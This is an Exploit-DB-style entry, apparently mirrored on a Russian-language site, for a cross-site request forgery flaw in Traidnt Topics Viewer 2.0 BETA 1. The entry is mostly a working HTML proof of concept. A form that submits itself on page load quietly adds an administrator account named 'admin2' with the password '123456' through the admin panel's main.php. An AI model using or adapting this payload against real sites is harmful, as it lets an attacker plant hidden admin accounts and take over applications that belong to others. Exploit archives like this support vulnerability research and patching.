- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36892
- Проверка EDB
-
- Пройдено
- Автор
- GREEN HORNET
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2012-02-29
Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery
HTML:
# source: https://www.securityfocus.com/bid/52224/info
#
# Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
#
# Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
#
<html>
<body onload="javascript:document.forms[0].submit()">
<p>by:thegreenhornet</p>
<form method="POST" name="form0" action="
http://www.example.com/top/admincp/main.php?op=add-admin">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value="[email protected]"/>
</form>
</body>- Источник
- www.exploit-db.com
